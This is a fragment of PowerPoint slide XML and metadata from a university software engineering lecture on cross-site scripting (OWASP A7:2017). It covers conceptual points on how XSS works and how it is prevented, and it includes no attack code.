            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>How can an attacker trick the victim to access the comment?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The victim browser should be willing to run the script code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Modern browsers protect against site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The Web app should not allow scripts to be posted</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26387222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8627</TotalTime>
  <Words>3495</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>411</Paragraphs>
  <Slides>57</Slides>
  <Notes>57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A7:2017 – Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Baseline Scenario</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What is Cross-site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XSS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Hand-On Experience (WebGoat – Cross Site Scripting )</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How to Prevent XSS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Software Engineering COMP47660</dc:title>
  <dc:creator>Liliana Pasquale</dc:creator>
  <cp:lastModifiedBy>Liliana Pasquale</cp:lastModifiedBy>
  <cp:revision>515</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-24T13:29:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-11T17:28:20Z</dcterms:modified>
</cp:coreProperties>
</file>